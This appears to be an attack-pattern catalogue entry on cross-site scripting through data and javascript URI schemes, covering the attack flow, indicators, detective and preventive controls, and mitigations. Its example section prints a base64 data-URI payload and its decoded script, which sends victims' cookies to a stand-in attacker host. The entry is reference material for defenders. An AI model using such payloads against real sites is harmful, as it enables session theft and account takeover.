An attack of this type exploits the ability of most browsers to interpret
“data”, “javascript” or other URI schemes as client-side executable content
placeholders. This attack consists of passing a malicious URI in an anchor
tag HREF attribute or any other similar attributes in other HTML tags. Such
malicious URI contains, for example, a base64 encoded HTML content with an
embedded cross-site scripting payload. The attack is executed when the
browser interprets the malicious content i.e., for example, when the victim
clicks on the malicious link.
Attack Execution Flow
Explore
Survey the
application::
Using a browser or an automated tool, an attacker
follows all public links on a web site. He records
all the links he finds.
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Use a spidering tool to follow and record
all links. Make special note of any links that
include parameters in the URL.
env-Web
2
Use a proxy tool to record all links visited
during a manual traversal of the web application.
Make special note of any links that include
parameters in the URL. Manual traversal of this
type is frequently necessary to identify forms
that are GET method forms rather than POST
forms.
env-Web
3
Use a browser to manually explore the
website and analyze how it is constructed. Many
browser's plugins are available to facilitate the
analysis or automate the URL discovery.
env-Web
Indicators
ID
Type
Indicator Description
Environments
1
Positive
URL parameters are used by the application
or the browser (DOM) in a context that is
originally used for storing URL (anchor’s “href”,
script’s “src”, etc.)
env-Web
2
Inconclusive
Using URL rewriting, parameters may be part
of the URL path.
env-Web
3
Inconclusive
No parameters appear on the URL. Even though
none appear, the web application may still use
them if they are provided.
env-Web
4
Negative
Applications that have only static pages or
that simply present information without accepting
input are unlikely to be susceptible.
env-Web
Experiment
Attempt injection payload variations on
input parameters::
Possibly using an automated tool, an attacker
requests variations on the inputs he surveyed
before. He sends parameters that include variations
of payloads. He records all the responses from the
server that include unmodified versions of his
script.
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Use a list of XSS probe strings using
different URI schemes to inject in parameters of
known URLs. If possible, the probe strings contain
a unique identifier to trace the injected string
back to the entry point.
env-Web
2
Use a proxy tool to record results of manual
input of XSS probes in known URLs.
env-Web
Indicators
ID
Type
Indicator Description
Environments
1
Positive
Input parameters are printed back in a URL
placeholder that support different URI schemes
such as HREF, SRC, and other attributes
env-Web
2
Inconclusive
Nothing is returned to the web page. The
payload may be a stored to be served later. The
unique identifier from the probe helps to trace
the flow of the possible XSS
env-Web
Outcomes
ID
Type
Outcome Description
1
Success
The attacker's cross-site
scripting string is included in the URI scheme
content and can be triggered by a user (a victim
in this case).
2
Failure
Custom URI scheme aren’t
allowed by the application
3
Inconclusive
Some sensitive characters are
consistently encoded, but others are
not
Security Controls
ID
Type
Security Control Description
1
Detective
Monitor input to web
servers, application servers, and other HTTP
infrastructure (e.g., load balancers). Alert on
standard XSS probes. The majority of attackers use
well known strings to check for vulnerabilities.
Use the same vulnerability catalogs that hackers
use.
2
Preventative
Apply appropriate
input validation to filter all user-controllable
input of scripting
syntax
3
Preventative
Do not embed
user-controllable input generated HTTP
headers
4
Preventative
Actively monitor the
application and either deny or redirect requests
from origins that appear to be generating XSS
probes.
As the attacker succeeds in exploiting the
vulnerability, he can choose to steal user's
credentials in order to reuse or to analyze them
later on.
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Develop malicious JavaScript that is
injected through vectors identified during the
Experiment Phase and loaded by the victim's
browser and sends document information to the
attacker.
env-Web
2
Develop malicious JavaScript that injected
through vectors identified during the Experiment
Phase and takes commands from an attacker's server
and then causes the browser to execute
appropriately.
env-Web
Outcomes
ID
Type
Outcome Description
1
Success
The attacker gets the user's
cookies or other session
identifiers.
2
Success
The attacker gets the content
of the page the user is
viewing.
3
Success
The attacker causes the user's
browser to visit a page with malicious
content.
Security Controls
ID
Type
Security Control Description
1
Detective
Monitor server logs
for scripting parameters.
2
Detective
Monitor server logs
for referrers. If users are being tricked into
clicking XSS links through forums or other web
postings, their web browsers will be providing
Referrer headers most of the time. These can help
indicate that the actual request is illegitimate.
3
Preventative
Apply appropriate
input validation to filter all user-controllable
input of scripting syntax
4
Preventative
Appropriately encode
all browser output to avoid scripting syntax
5
Preventative
Actively monitor the
application and either deny or redirect requests
from origins that appear to be generating XSS
probes.
Forceful browsing::
When the attacker targets the current application
or another one (through CSRF vulnerabilities), the
user will then be the one who perform the attacks
without being aware of it. These attacks are mostly
targeting application logic flaws, but it can also
be used to create a widespread attack against a
particular website on the user's current network
(Internet or not).
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Develop malicious JavaScript that is
injected through vectors identified during the
Experiment Phase and loaded by the victim's
browser and performs actions on the same web
site
env-Web
2
Develop malicious JavaScript that injected
through vectors identified during the Experiment
Phase and takes commands from an attacker's server
and then causes the browser to execute request to
other web sites (especially the web applications
that have CSRF vulnerabilities).
env-Web
Outcomes
ID
Type
Outcome Description
1
Success
The attacker indirectly
controls the user's browser and makes it
performing actions exploiting
CSRF.
2
Success
The attacker manipulates the
browser through the steps that he designed in his
attack. The user, identified on a website, is now
performing actions he is not aware
of.
Security Controls
ID
Type
Security Control Description
1
Detective
Monitor server logs
for scripting parameters.
2
Detective
Monitor server logs
for referrers. If users are being tricked into
clicking XSS links through forums or other web
postings, their web browsers will be providing
Referrer headers most of the time. These can help
indicate that the actual request is illegitimate.
3
Preventative
Apply appropriate
input validation to filter all user-controllable
input of scripting syntax
4
Preventative
Appropriately encode
all browser output to avoid scripting syntax
5
Preventative
Actively monitor the
application and either deny or redirect requests
from origins that appear to be generating XSS
probes.
Content spoofing::
By manipulating the content, the attacker targets
the information that the user would like to get from
the website
Attack Step Techniques
ID
Attack Step Technique Description
Environments
1
Develop malicious JavaScript that is
injected through vectors identified during the
Experiment Phase and loaded by the victim's
browser and exposes attacker-modified invalid
information to the user on the current web
page.
env-Web
Outcomes
ID
Type
Outcome Description
1
Success
The user sees a page containing
wrong information
Security Controls
ID
Type
Security Control Description
1
Detective
Monitor server logs
for scripting parameters.
2
Detective
Monitor server logs
for referrers. If users are being tricked into
clicking XSS links through forums or other web
postings, their web browsers will be providing
Referrer headers most of the time. These can help
indicate that the actual request is illegitimate.
3
Preventative
Apply appropriate
input validation to filter all user-controllable
input of scripting syntax
4
Preventative
Appropriately encode
all browser output to avoid scripting syntax
5
Preventative
Actively monitor the
application and either deny or redirect requests
from origins that appear to be generating XSS
probes.
Attack Prerequisites
Target client software must allow scripting such as JavaScript and allows
executable content delivered using a data URI scheme.
Typical Likelihood of Exploit
Likelihood: High
Methods of Attack
Injection
Protocol Manipulation
Examples-Instances
Description
The following payload
data:text/html;base64,PGh0bWw+PGJvZHk+PHNjcmlwdD52YXIgaW1nID0gbmV3IEltYWdlKCk7IGltZy5zcmMgPSAiaHR0cDovL2F0dGFja2VyLmNvbS9jb29raWVncmFiYmVyPyIrIGVuY29kZVVSSUNvbXBvbmVudChkb2N1bWVudC5jb29raWVzKTs8L3NjcmlwdD48L2JvZHk+PC9odG1sPg==
represents a base64 encoded HTML and uses the data URI scheme to deliver
it to the browser. The decoded payload is the following piece of HTML
code: <html><body><script>var img = new Image();
img.src = "http://attacker.com/cookiegrabber?"+
encodeURIComponent(document.cookies);</script></body></html>
Web applications that take user controlled inputs and reflect them in
URI HTML placeholder without a proper validation are at risk for such an
attack. An attacker could inject the previous payload that would be
placed in a URI placeholder (for example in the anchor tag HREF
attribute): <a href="INJECTION_POINT">My Link</a>
Once the victim clicks on the link, the browser will decode and execute
the content from the payload. This will result on the execution of the
cross-site scripting attack.
Attacker Skills or Knowledge Required
Skill or Knowledge Level: Medium
To inject the malicious payload in a web page
Resources Required
Ability to send HTTP request to a web application
Solutions and Mitigations
Design: Use browser technologies that do not allow client side
scripting.
Design: Utilize strict type, character, and encoding enforcement.
Implementation: Ensure all content that is delivered to client is
sanitized against an acceptable content specification.
Implementation: Ensure all content coming from the client is using the
same encoding; if not, the server-side application must canonicalize the
data before applying any filtering.
Implementation: Perform input validation for all remote content, including
remote and user-generated content
Implementation: Perform output validation for all remote content.
Implementation: Disable scripting languages such as JavaScript in
browser
Implementation: Patching software. There are many attack vectors for XSS
on the client side and the server side. Many vulnerabilities are fixed in
service packs for browser, web servers, and plug in technologies, staying
current on patch release that deal with XSS countermeasures mitigates
this.
Attack Motivation-Consequences
Scope
Technical Impact
Note
Integrity
Modify files or
directories
Confidentiality
Read files or
directories
Integrity
Modify application
data
Confidentiality
Read application
data
Authorization
Execute unauthorized code or
commands
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume
identity
Access_Control
Authorization
Bypass protection
mechanism
Injection Vector
Any HTTP Request transport variables (GET, POST, Headers, etc.)
Payload
XSS malicious script leveraging URI schemes
Activation Zone
Client web browser where script is executed
Payload Activation Impact
Description
Client web browser may be used to steal session data, passwords, cookies,
and other tokens.
Description
